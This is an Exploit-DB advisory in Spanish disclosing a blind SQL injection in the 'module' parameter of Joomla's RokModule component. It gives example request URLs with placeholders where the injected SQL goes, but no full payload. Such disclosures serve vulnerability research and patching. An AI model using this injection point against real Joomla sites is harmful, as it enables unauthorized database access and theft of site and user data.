Joomla RokModule Component index.php module parameter Blind SQLi

2012-09-10T00:00:00
ID EDB-ID:21221
Type exploitdb
Reporter Yarolinux
Modified 2012-09-10T00:00:00

Description

Joomla RokModule Component (index.php module parameter) Blind SQLi. CVE-2010-1479,CVE-2010-1480. Webapps exploit for php platform

                                        
                                            Titulo: Joomla Component RokModule Blind SQLi [module] Vulnerability

Nombre del Componente: Com_rokmodule

Empresa: http://www.rockettheme.com/

Testeado: Linux Backtrack

Autor: Yarolinux Para WebSecurityDev
Twitter: @Yarolinux

Fecha: 09/09/2012

Bueno la Injeccion Va de la siguiente manera:

http://localhost/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]

http://localhost/web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=[sqli]or[BlindSQLi]


Ok! Eso es todo Difrutenlo!

Estamos trabajando en un laboratorio testeandolo en Joomla 1.7, Muy 
pronto resultados :D

Greetz: Dylan Irzi & WebSecurityDev